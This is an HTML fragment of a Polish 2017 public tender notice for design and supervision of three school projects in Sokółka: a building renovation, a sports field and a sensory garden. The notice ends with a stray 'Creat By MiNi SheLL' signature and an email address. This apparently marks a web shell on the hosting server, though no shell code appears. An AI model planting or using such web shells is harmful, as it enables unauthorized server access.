              </b><div style="padding-left: 20px">1)	Formularza ofertowego - (druk stanowiący załącznik nr 1 do SIWZ);
2)	Oświadczenia podmiotu trzeciego zawierające zobowiązanie do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (druk stanowiący załącznik nr 2 do SIWZ)
3)	Dokumentu ustanawiającego pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia;
4)	Pełnomocnictwa - w przypadku gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena za prace projektowe</td><td>35</td></tr><tr><td>cena za nadzór inwestorski</td><td>25</td></tr><tr><td>okres rękojmi</td><td>30</td></tr><tr><td>termin płatności</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której będzie dokonany wybór Wykonawcy.
Zamawiający przewiduje, że wprowadzenie zmian do zawartej umowy możliwe będzie w przypadkach określonych w art. 144 Ustawy, w tym w szczególności gdy Zamawiający uzna, że zmiany te są niezbędne celem zapewnienia prawidłowego wykonania umowy przez strony, w tym w następujących przypadkach: 
1) omyłek pisarskich lub błędów rachunkowych, 
2) mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami, 
3) konieczności zmiany sposobu wykonania lub zakresu zamówienia z przyczyn wcześniej nie przewidzianych, lub w przypadku zmiany potrzeb Zamawiającego,
4) konieczności zmiany terminu wykonania zamówienia z przyczyn niezawinionych przez Wykonawcę, 
5) jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego, 
6) zmiana wartości brutto wynagrodzenia Wykonawcy w przypadku zmiany ustawowej wysokości podatku od towarów i usług, 
7) zmiany albo rezygnacji z podwykonawcy z tym zastrzeżeniem, iż jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b Ustawy, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy, przed zmianą umowy Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia wymagania w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia, 8) odstąpienia przez Zamawiającego od realizacji umowy w zakresie sprawowania nadzoru inwestorskiego (bez odszkodowania na rzecz Wykonawcy) w przypadku rezygnacji z realizacji zamówienia w szczególności ze względu na nieotrzymanie środków zewnętrznych na realizację zamówienia, 
9) innych zmian korzystnych dla Zamawiającego, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/05/2017, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>wykonanie dokumentacji projektowo-kosztorysowej i pełnienie funkcji inspektora nadzoru inwestorskiego przy remoncie części administracyjnej budynku warsztatów szkolnych przy Zespole Szkół Zawodowych w Sokółce<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zakres prac projektowych objętych zamówieniem:
1. przy remoncie części administracyjnej budynku warsztatów szkolnych przy Zespole Szkół Zawodowych w Sokółce: 
- wykonanie dokumentacji projektowo-kosztorysowej ogólnobudowlanej wraz z wentylacją (bez wymiany stolarki okiennej i drzwi zewnętrznych), dokumentacji projektowo  kosztorysowej modernizacji wewnętrznej instalacji elektrycznej, dokumentacji projektowo - kosztorysowej sieci komputerowej (zasilającej i logicznej z wyposażeniem serwerowni), dokumentacji projektowo - kosztorysowej telewizji przemysłowej wewnątrz i na zewnątrz budynku, dokumentacji projektowo - kosztorysowej instalacji antywłamaniowej,
Przedmiotem zamówienia objęte jest również pełnienie funkcji inspektora nadzoru inwestorskiego w trakcie realizacji prac objętych zamówieniem od dnia rozpoczęcia robót budowlanych do dnia odbioru końcowego robót
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71220000-6, 71221000-3,
                    71222000-0,
                    71247000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 19/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena za prace projektowe</td><td>35</td></tr><tr><td>cena za nadór inwestorski</td><td>25</td></tr><tr><td>okres rękojmi</td><td>30</td></tr><tr><td>termin płatności </td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>wykonanie dokumentacji projektowo-kosztorysowej i pełnienie funkcji inspektora nadzoru inwestorskiego przy budowie boiska wielofunkcyjnego na działce 3102/3 przy budynku Zespołu Szkół Zawodowych w Sokółce<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>- wykonanie dokumentacji projektowo-kosztorysowej boiska wielofunkcyjnego o powierzchni poliuretanowej o wymiarach pozwalających na usytuowanie pełnowymiarowego boiska do piłki ręcznej, futsalu, koszykówki i dwóch poprzecznych boisk do siatkówki. Wzdłuż jednej z krawędzi należy zaprojektować czterotorową bieżnię o powierzchni poliuretanowej o długości pozwalającej rozgrywanie zawodów biegowych na dystansie do 100 m wydłużoną o start i dobieg oraz zakończoną zeskokiem do skoku w dal i trójskoku. Wzdłuż drugiej krawędzi należy zaprojektować ściankę wspinaczkową o wysokości min. 8 m. w kształcie zbliżonym do prostopadłościanu z wywieszeniem 2 m. przynajmniej przy jednej z krawędzi ścianki. W bezpośrednim sąsiedztwie boiska należy zaprojektować siłownię napowietrzną, w której skład weszłyby np.: orbitrek lub biegacz, wyciskanie siedząc, wioślarz, motyl, podciąg nóg, poręcz, trenażer ramion, twister. 
Wzdłuż dłuższych krawędzi należy zaprojektować po dwa rzędy ławek dla widzów.
Należy zaprojektować piłkochwyty za bramkami wraz z ogrodzeniem od strony granicy działki, ciągi komunikacyjne z dojściem do projektowanych obiektów (w tym przebudowę chodnika i drogi wewnętrznej przed budynkiem Zespołu Szkół Zawodowych), oświetlenie zewnętrzne i monitoring boiska, siłowni i ścianki wspinaczkowej a także przygotować wykaz niezbędnego wyposażenia projektowanego obiektu.
Przed przystąpieniem do fazy projektowania, Wykonawca zobowiązany jest wykonać inwentaryzację terenu inwestycji, która będzie stanowić część opisową dokumentacji projektowej. Inwentaryzacja powinna zawierać co najmniej: zwięzłą ocenę stanu istniejącego terenu przeznaczonego na inwestycję, inwentaryzację i ocenę zieleni, dokumentację fotograficzną, proponowane rozwiązania techniczno-funkcjonalne, wskazówki co do odprowadzenia wód opadowych z terenu inwestycji. W związku z tym, iż dokumentacja projektowa stanowić będzie podstawę do wszczęcia procedury zgłoszenia robót budowlanych/pozwolenia na budowę oraz stanowić będzie podstawę do przeprowadzenia postępowania o udzielenie zamówienia publicznego na wykonanie robót nią objętych, przedmiot zamówienia musi zostać wykonany zgodnie z warunkami i założeniami opisanymi w Specyfikacji Istotnych Warunków Zamówienia i wzorze umowy; zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej, w tym w szczególności:
 a) projektowany obiekt winien spełniać wymogi stawiane dla obiektów sportowych o nawierzchni poliuretanowej, oraz być przystosowany dla osób niepełnosprawnych, 
b) wszelkie wyposażenie obiektu musi być zgodne z aktualnymi normami oraz spełniać wymogi Rozporządzenia Ministra Edukacji Narodowej z dnia 31 grudnia 2002 roku w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach. 
Przedmiotem zamówienia objęte jest również pełnienie funkcji inspektora nadzoru inwestorskiego w trakcie realizacji prac objętych zamówieniem od dnia rozpoczęcia robót budowlanych do dnia odbioru końcowego robót.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71220000-6, 71221000-3,
                    71222000-0,
                    71247000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 19/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>ena za prace projektowe </td><td>35</td></tr><tr><td>cena za nadzór nwestorski</td><td>25</td></tr><tr><td>okres rękojmi</td><td>30</td></tr><tr><td>termin płatności</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>wykonanie dokumentacji projektowo-kosztorysowej i pełnienie funkcji inspektora nadzoru inwestorskiego przy budowie ogrodu polisensorycznego przy Specjalnym Ośrodku Szkolno-Wychowawczym w Sokółce<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>przy budowie ogrodu polisensorycznego przy Specjalnym Ośrodku Szkolno-Wychowawczym w Sokółce zakłada się stworzenie infrastruktury przestrzennej umożliwiającej stymulowanie zmysłów - dotyku, węchu, słuchu, wzroku i smaku z wykorzystaniem ukształtowania terenu, istniejącej i projektowanej roślinności, projektowanych ścieżek i obiektów małej architektury. Planuje się wykonanie: oczka wodnego (kaskada-wodospad) podświetlanego, z obiegiem zamkniętym wody; miejsca na ognisko i grilla z wiatą oraz stałymi siedziskami; placu do rozgrywania gier i zawodów sprawnościowych ze stałymi siedziskami dla uczestników tychże zawodów i publiczności, placu rehabilitacyjno-edukacyjnego z linearium, trampoliną, huśtawką, karuzelą, mostkiem, tunelem; ogrodów: kwiatowego i warzywnego na wyniesionych rabatach z roślinami kwitnącymi i owocującymi głównie na początku i pod koniec lata (ze względu na przerwę wakacyjną w Ośrodku); ścieżek: przyrodniczo-edukacyjnych i rowerowych o różnorodnych nawierzchniach (z kostki granitowej, kostki betonowej, bruku kamiennego z otoczaków, żwirowe, piaskowe, z kory lub zrębków); nasadzeń drzew i krzewów iglastych i liściastych, w tym owocowych o ciekawych cechach i właściwościach. 
Należy zaprojektować nowe ogrodzenie z bramami przesuwnymi, furtkami, wjazdami i wejściami od strony ulicy Osiedle Zielone.
Przy projektowaniu należy uwzględnić rozmieszczenie punktów świetlnych o walorach użytkowo-dekoracyjnych, rozmieszczenie różnorodnych instrumentów muzycznych tj. gongi, instrumenty perkusyjne, dzwony, dzwonki, piszczałki, telefon-tubę,
Należy zaprojektować system monitoringu na całym terenie obejmującym ogród sensoryczny.
Przed przystąpieniem do fazy projektowania, Wykonawca zobowiązany jest wykonać inwentaryzację terenu inwestycji, która będzie stanowić część opisową dokumentacji projektowej, ująć do wyburzenia zbędne wiaty lub budynki gospodarcze, chyba że mogłyby być wykorzystane w późniejszym procesie projektowania. Inwentaryzacja powinna zawierać co najmniej: zwięzłą ocenę stanu istniejącego terenu przeznaczonego na inwestycję, inwentaryzację i ocenę zieleni, dokumentację fotograficzną, proponowane rozwiązania techniczno-funkcjonalne, wskazówki co do odprowadzenia wód opadowych z terenu inwestycji. W związku z tym, iż dokumentacja projektowa stanowić będzie odpowiednio podstawę do wszczęcia procedury zgłoszenia robót budowlanych/pozwolenia na budowę oraz stanowić będzie podstawę do przeprowadzenia postępowania o udzielenie zamówienia publicznego na wykonanie robót nią objętych, przedmiot zamówienia musi zostać wykonany zgodnie z warunkami i założeniami opisanymi w Specyfikacji Istotnych Warunków Zamówienia i wzorze umowy; zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej, w tym w szczególności: 
a) projektowany obiekt winien być przystosowany dla osób niepełnosprawnych, 
b) wszelkie wyposażenie obiektu musi być zgodne z aktualnymi normami oraz spełniać wymogi Rozporządzenia Ministra Edukacji Narodowej z dnia 31 grudnia 2002 roku w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach.
Przedmiotem zamówienia objęte jest również pełnienie funkcji inspektora nadzoru inwestorskiego w trakcie realizacji ogrodu polisensorycznego od dnia rozpoczęcia robót budowlanych do dnia odbioru końcowego robót.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71220000-6, 71221000-3,
                    71222000-0,
                    71247000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 19/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena za prace projektowe</td><td>35</td></tr><tr><td>cena za nadzór inwestorski</td><td>25</td></tr><tr><td>okres rękojmi</td><td>30</td></tr><tr><td>termin płatności</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com